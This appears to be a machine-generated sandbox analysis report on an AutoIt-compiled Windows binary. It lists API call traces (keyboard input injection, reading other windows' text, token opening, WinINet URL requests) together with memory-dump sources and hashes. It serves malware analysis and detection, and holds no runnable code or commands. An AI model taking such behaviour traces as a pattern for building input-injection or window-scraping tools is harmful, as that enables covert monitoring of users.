                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: 32b30aa719c0706177e8dbbf6c7d13da3b7e7aa02d8f9a0dd987db7213fe3542
                                                    • Instruction ID: 1febe0da402453e1ece77294999a091f8b49920c5af1c38ad2b8f6077ba5b528
                                                    • Opcode Fuzzy Hash: 32b30aa719c0706177e8dbbf6c7d13da3b7e7aa02d8f9a0dd987db7213fe3542
                                                    • Instruction Fuzzy Hash: A641BC70680109EFEB11DF58C884AAA7BF5FB49350F2581BAE5288B351C734A816CF5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetKeyboardState.USER32(?,774273F0,?,00008000), ref: 00421176
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00421192
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 004211F1 (message 00000101 = WM_KEYUP: a synthesized key release)
                                                    • SendInput.USER32(00000001,00000000,0000001C,774273F0,?,00008000), ref: 00421243
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 00e5cad8e269f54cfa59487237ec78c8b5fa0fe40a0b30e18fa290b9f89f0c30
                                                    • Instruction ID: 3867fd88df1dcebb35df12f8ae4025a3aedaa681b5fe48d23987d2daa9789df6
                                                    • Opcode Fuzzy Hash: 00e5cad8e269f54cfa59487237ec78c8b5fa0fe40a0b30e18fa290b9f89f0c30
                                                    • Instruction Fuzzy Hash: AC313D30B40228ADFB208BA5AC05BFB7B79EB6A311F94435FF240911E1C37D4955C769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004475C0
                                                    • IsMenu.USER32 ref: 004475D8
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00447620
                                                    • DrawMenuBar.USER32 ref: 00447633
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert
                                                    • String ID:
                                                    • API String ID: 3076010158-0
                                                    • Opcode ID: 6d2b9c4902e9f912496300b021a7f5b5a1f7a85eac9e357352dc678832c20556
                                                    • Instruction ID: 03ad00743ced615faf4173b814a728e19dde88eb691da5a357fd5439959c331e
                                                    • Opcode Fuzzy Hash: 6d2b9c4902e9f912496300b021a7f5b5a1f7a85eac9e357352dc678832c20556
                                                    • Instruction Fuzzy Hash: E7417B75A05608EFEB10DF54D884EAABBF9FB05364F05842AF9559B350CB34AD02CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00445189
                                                      • Part of subcall function 0042387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00423897
                                                      • Part of subcall function 0042387D: GetCurrentThreadId.KERNEL32 ref: 0042389E
                                                      • Part of subcall function 0042387D: AttachThreadInput.USER32(00000000,?,004252A7), ref: 004238A5
                                                    • GetCaretPos.USER32(?), ref: 0044519A
                                                    • ClientToScreen.USER32(00000000,?), ref: 004451D5
                                                    • GetForegroundWindow.USER32 ref: 004451DB
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 88453695aee444d2868cf2e96e1e8d7e5b589fd5e7c46a32084c47c794d90539
                                                    • Instruction ID: 42970ac91a58c8e8fa69d5b4d21e0c114bb4a2756bb5c0c0fd01de9213c1cd16
                                                    • Opcode Fuzzy Hash: 88453695aee444d2868cf2e96e1e8d7e5b589fd5e7c46a32084c47c794d90539
                                                    • Instruction Fuzzy Hash: BC310F75900118AFDB00EFA6C845EEFB7F9EF98304F11406BE415EB241EA75AE45CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00431B40
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00431B66
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00431B96 (info level 00000005 = HTTP_QUERY_CONTENT_LENGTH)
                                                    • InternetCloseHandle.WININET(00000000), ref: 00431BDD
                                                      • Part of subcall function 00432777: GetLastError.KERNEL32(?,?,00431B0B,00000000,00000000,00000001), ref: 0043278C
                                                      • Part of subcall function 00432777: SetEvent.KERNEL32(?,?,00431B0B,00000000,00000000,00000001), ref: 004327A1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-0
                                                    • Opcode ID: 0ed9a38877a6e7076d5de13a6458764e50baeed20c5c44dd69a88f616f1b39dd
                                                    • Instruction ID: 7bf61e254f4f9d5e3919c5956945244ffcf7db88ed3324da86aaba8afaf45695
                                                    • Opcode Fuzzy Hash: 0ed9a38877a6e7076d5de13a6458764e50baeed20c5c44dd69a88f616f1b39dd
                                                    • Instruction Fuzzy Hash: 042101B2500208BFEB119F61DCC5EFBB7ACEB4A398F10112BF101A2150EA38AD059779
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsWindowVisible.USER32 ref: 0041B6C7
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0041B6E4 (message 0000000E = WM_GETTEXTLENGTH)
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0041B71C (message 0000000D = WM_GETTEXT: reads another window's text)
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0041B742
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                    • String ID:
                                                    • API String ID: 2796087071-0

                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • GetCursorPos.USER32(?,?,?,?,?,?,?,?,003FBBFB,?,?,?,?,?), ref: 0044C7C2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003FBBFB,?,?,?,?,?), ref: 0044C7D7
                                                    • GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,003FBBFB,?,?,?,?,?), ref: 0044C824
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003FBBFB,?,?,?), ref: 0044C85E
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0

                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00431A97
                                                      • Part of subcall function 00431B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00431B40
                                                      • Part of subcall function 00431B21: InternetCloseHandle.WININET(00000000), ref: 00431BDD
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0

                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,0044FAC0,?,?), ref: 00423CA0
                                                    • GetLastError.KERNEL32(?,?), ref: 00423CAF
                                                    • CreateDirectoryW.KERNEL32(?,?,?,?), ref: 00423CBE
                                                    • CreateDirectoryW.KERNEL32(?,?,00000000,000000FF,0044FAC0,?,?), ref: 00423D1B
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2267087916-0

                                                    APIs
                                                      • Part of subcall function 0041F5AD: lstrlenW.KERNEL32(?,?,?,?,?,?,0041E1C4,?), ref: 0041F5BC
                                                      • Part of subcall function 0041F5AD: lstrcpyW.KERNEL32 ref: 0041F5E2
                                                      • Part of subcall function 0041F5AD: lstrcmpiW.KERNEL32(00000000,?,?,?,?,?,0041E1C4,?), ref: 0041F613
                                                    • lstrlenW.KERNEL32(?,?,?,?), ref: 0041E1DD
                                                    • lstrcpyW.KERNEL32 ref: 0041E203
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,?,?), ref: 0041E237
                                                    Strings
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584

                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 003F19A8
                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,?,?,?), ref: 003F19BC
                                                    • GetLastError.KERNEL32(?,?,?), ref: 003F19C2
                                                    Similarity
                                                    • API ID: FilePointer$ErrorLast
                                                    • String ID:
                                                    • API String ID: 142388799-0

                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00424D5C
                                                    • MessageBoxW.USER32(00000000,?,00000004,?), ref: 00424D8F
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00424DA5
                                                    • CloseHandle.KERNEL32(00000000), ref: 00424DAC
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0

                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00419043
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00419055
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0041906B
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00419086
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0

                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 003C12D8
                                                    • GetClientRect.USER32 ref: 003FB84B
                                                    • GetCursorPos.USER32(?), ref: 003FB855
                                                    • ScreenToClient.USER32 ref: 003FB860
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0

                                                    APIs
                                                    • CreateWindowExW.USER32 ref: 003C1D73
                                                    • GetStockObject.GDI32(00000011), ref: 003C1D87
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                                                    Similarity
                                                    • API ID: CreateMessageObjectSendStockWindow
                                                    • String ID:
                                                    • API String ID: 3970641297-0

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0041DD3E
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0041DD55
                                                    • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0041DD6A
                                                    • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0041DD88
                                                    Similarity
                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                    • String ID:
                                                    • API String ID: 1352324309-0

                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004201FD,?,00421250,?,00008000), ref: 0042166F
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,004201FD,?,00421250,?,00008000), ref: 00421694
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004201FD,?,00421250,?,00008000), ref: 0042169E
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,004201FD,?,00421250,?,00008000), ref: 004216D1
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0

                                                    APIs
                                                    • GetWindowRect.USER32 ref: 0044B59E
                                                    • ScreenToClient.USER32 ref: 0044B5B6
                                                    • ScreenToClient.USER32 ref: 0044B5DA
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044B5F5
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0

                                                    APIs
                                                      • Part of subcall function 003C12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C134D
                                                      • Part of subcall function 003C12F3: SelectObject.GDI32(?,00000000), ref: 003C135C
                                                      • Part of subcall function 003C12F3: BeginPath.GDI32(?), ref: 003C1373
                                                      • Part of subcall function 003C12F3: SelectObject.GDI32(?,00000000), ref: 003C139C
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0044C030
                                                    • LineTo.GDI32(00000000,?,?), ref: 0044C03D
                                                    • EndPath.GDI32(00000000), ref: 0044C04D
                                                    • StrokePath.GDI32(00000000), ref: 0044C05B
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageTimeoutW.USER32 ref: 0041A399
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0041A3AC
                                                    • GetCurrentThreadId.KERNEL32 ref: 0041A3B3
                                                    • AttachThreadInput.USER32(00000000,?,0041A554,?,00000001,0044F910,?,00000001), ref: 0041A3BA
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 003C2231
                                                    • SetTextColor.GDI32(?,000000FF), ref: 003C223B
                                                    • SetBkMode.GDI32(?,00000001), ref: 003C2250
                                                    • GetStockObject.GDI32(00000005), ref: 003C2258
                                                    • GetWindowDC.USER32(?,00000000), ref: 003FC0D3
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 003FC0E0
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 003FC0F9
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 003FC112
                                                    • GetPixel.GDI32(00000000,?,?), ref: 003FC132
                                                    • ReleaseDC.USER32 ref: 003FC13D
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00418C63
                                                    • OpenThreadToken.ADVAPI32(00000000,?,004186DD,?,?,?,0041886B), ref: 00418C6A
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,004186DD,?,?,?,0041886B), ref: 00418C77
                                                    • OpenProcessToken.ADVAPI32(00000000,?,004186DD,?,?,?,0041886B), ref: 00418C7E
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: X
                                                    • API String ID: 0-3081909835
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 003D2AC8
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 003D2AE1
                                                    Strings
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID: DtH$DtH
                                                    • API String ID: 1473721057-3197090414
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?), ref: 00446D86
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00446DC2
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004469D0
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004469DB
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                                                      • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                                                      • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                                                    • GetWindowRect.USER32 ref: 00446EE0
                                                    • GetSysColor.USER32(00000012), ref: 00446EFA
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00446C11
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00446C20
                                                    Strings
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00432520
                                                    • InternetSetOptionW.WININET(00000000,00000032,00000003,00000008), ref: 00432549
                                                    Strings
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 63f2095589102f12e53d2cc5bef33e0caa7cfb808ca55fc9cbc6d63324313d57
                                                    • Instruction ID: db02d255e4b9e0bdf30eb9379195a1e994be1b062c30107c0f423c64b390e2f4
                                                    • Opcode Fuzzy Hash: 63f2095589102f12e53d2cc5bef33e0caa7cfb808ca55fc9cbc6d63324313d57
                                                    • Instruction Fuzzy Hash: 9F1132B0200225BADB248F11CD99EFBBF6CFB1A395F10912BF50552140D3B82A45DAB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0043830B: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004380C8,?,?,?,?), ref: 00438322
                                                    • inet_addr.WSOCK32(?,?,?,?,?,?,00000000), ref: 004380CB
                                                    • htons.WSOCK32(?,?,00000000), ref: 00438108
                                                    Similarity
                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 2496851823-2422070025
                                                    • Opcode ID: bc198c299326ac8fbcc6057555339b51433744f99c48f8005ab37d2b5ba1f493
                                                    • Instruction ID: 06c686f0e3b79385aced4b3151f863795623b4e2388cf69fbef798a0fd23774e
                                                    • Opcode Fuzzy Hash: bc198c299326ac8fbcc6057555339b51433744f99c48f8005ab37d2b5ba1f493
                                                    • Instruction Fuzzy Hash: 1D118E75200209ABDB10AFA4DC86FFEF738EF05364F20851FF5259B292CA36A855C759
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
                                                    • SendMessageW.USER32(?,000001A2,000000FF,00000005), ref: 00419355
                                                    Similarity
                                                    • API ID: ClassMessageNameSend
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 3678867486-1403004172
                                                    • Opcode ID: 36cb7a227f2a0abcf08ec74cd1912d31a00d342b3d234ab93cec06c7efb4e9fd
                                                    • Instruction ID: eac766f58bf0b376cf03968e983ac025e614ebe9dfa8715e6f202fc56a8c4eb5
                                                    • Opcode Fuzzy Hash: 36cb7a227f2a0abcf08ec74cd1912d31a00d342b3d234ab93cec06c7efb4e9fd
                                                    • Instruction Fuzzy Hash: 1001C4725061186BCB05EBA0CC92DFE776CEF06360714061EF931971D1DA252D488754
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
                                                    • SendMessageW.USER32(?,00000180,00000000,00000005), ref: 0041924D
                                                    Similarity
                                                    • API ID: ClassMessageNameSend
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 3678867486-1403004172
                                                    • Opcode ID: 735b182c72e8191fd42d0102fb4852dd5b2e8fe4808b37f740e442f4ae15891c
                                                    • Instruction ID: 333df1c4e2b32cc2c94f9ee4f2cdb6adaa933557ddd7cee09a42c6cbb9331632
                                                    • Opcode Fuzzy Hash: 735b182c72e8191fd42d0102fb4852dd5b2e8fe4808b37f740e442f4ae15891c
                                                    • Instruction Fuzzy Hash: 6D01D472A421087ADB06E7E0DC92EFF736CDF06380B20006EF502A7181EA296F489775
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
                                                    • SendMessageW.USER32(?,00000182,00000005,00000000), ref: 004192D0
                                                    Similarity
                                                    • API ID: ClassMessageNameSend
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 3678867486-1403004172
                                                    • Opcode ID: 9237f594af724eddfdb8ae2ee3893f6059ae6c9131ab4d63f48b0a7178a70f6a
                                                    • Instruction ID: e22630f37d99aca8034f2ef880a08287db029efd4d8c9fad1d66bac0856e2758
                                                    • Opcode Fuzzy Hash: 9237f594af724eddfdb8ae2ee3893f6059ae6c9131ab4d63f48b0a7178a70f6a
                                                    • Instruction Fuzzy Hash: 1F01F772A461047ADB02E7A0DC82FFF776CDF11390B24005EF901A71C1DA296F48977A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003E0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,003FB540,?,?,?,003C100A), ref: 003E0B89
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,003C100A), ref: 003FB544
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003C100A), ref: 003FB553
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003FB54E
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 55579361-631824599
                                                    • Opcode ID: 6beb60cbd73be346657e8e61cc73720eada19138bc3dd71c1a3690a0092315b2
                                                    • Instruction ID: a36a09b26ea3d6987275d5e1016b4374cba7c6447585854452b79360075a7d64
                                                    • Opcode Fuzzy Hash: 6beb60cbd73be346657e8e61cc73720eada19138bc3dd71c1a3690a0092315b2
                                                    • Instruction Fuzzy Hash: 2BE092B41007558FD322EF28E909796BBE0FB01358F00897DE08AC6250E7F9A448CB76
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004181CA
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 2030045667-4017498283
                                                    • Opcode ID: 8febd33302d5bf4cf8e4b21b2994ab7a534b4aac838ff68f71133eabdf3516ef
                                                    • Instruction ID: e078500ba129a104cd203ace24d87408328f36c46f9f797780c1a3fd77027530
                                                    • Opcode Fuzzy Hash: 8febd33302d5bf4cf8e4b21b2994ab7a534b4aac838ff68f71133eabdf3516ef
                                                    • Instruction Fuzzy Hash: 32D05B323C537832D21633A56C0BFC676484B05B52F104427BB0C996D38DD65DC642DD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00401B9F
                                                      • Part of subcall function 0043C304: LoadLibraryA.KERNEL32(kernel32.dll,?,00401D88,?), ref: 0043C312
                                                      • Part of subcall function 0043C304: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043C324
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00401D97
                                                    Similarity
                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                    • String ID: WIN_XPe
                                                    • API String ID: 582185067-3257408948
                                                    • Opcode ID: d607b05c7558e124b17d22c48c6185a2015a826757167248626c607a829deb19
                                                    • Instruction ID: 8d0f94303f60086a48b601ae1f108761c2bac5cb50b0702ef8b60ce28309ee4e
                                                    • Opcode Fuzzy Hash: d607b05c7558e124b17d22c48c6185a2015a826757167248626c607a829deb19
                                                    • Instruction Fuzzy Hash: EEF0C970814109DFDB15DB91C988AEDBBF8AB08304F5400AAE502B65A1E779AF85DF29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00429B82
                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,00000003), ref: 00429B99
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: 6450e9b92f4c0e3b2f7ace0fb0ccae1fbbb96fdecb7752da0cd5c890b3979e2b
                                                    • Instruction ID: 016bc7458b3609630719ecd8961dbdf9a00e4d227698ac337126a661c9875e8c
                                                    • Opcode Fuzzy Hash: 6450e9b92f4c0e3b2f7ace0fb0ccae1fbbb96fdecb7752da0cd5c890b3979e2b
                                                    • Instruction Fuzzy Hash: 10D05B7A54020D7BDB109BD0EC0EFFB772CE705345F0041B2F65490491C9B761988B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 481472006-2409531811
                                                    • Opcode ID: d1a6bca64ce08f6b3327d150c27f364c89424533f9650bcc1045ebba41075390
                                                    • Instruction ID: 85c41c1df350b6eb28232bbf3e75795a2ca6c7fe0250d0785ce34f95a406ede8
                                                    • Opcode Fuzzy Hash: d1a6bca64ce08f6b3327d150c27f364c89424533f9650bcc1045ebba41075390
                                                    • Instruction Fuzzy Hash: 28D0EC75804118EACA159A908844DF9777CA704301F5005A3B506A2490F37DAB969B2A
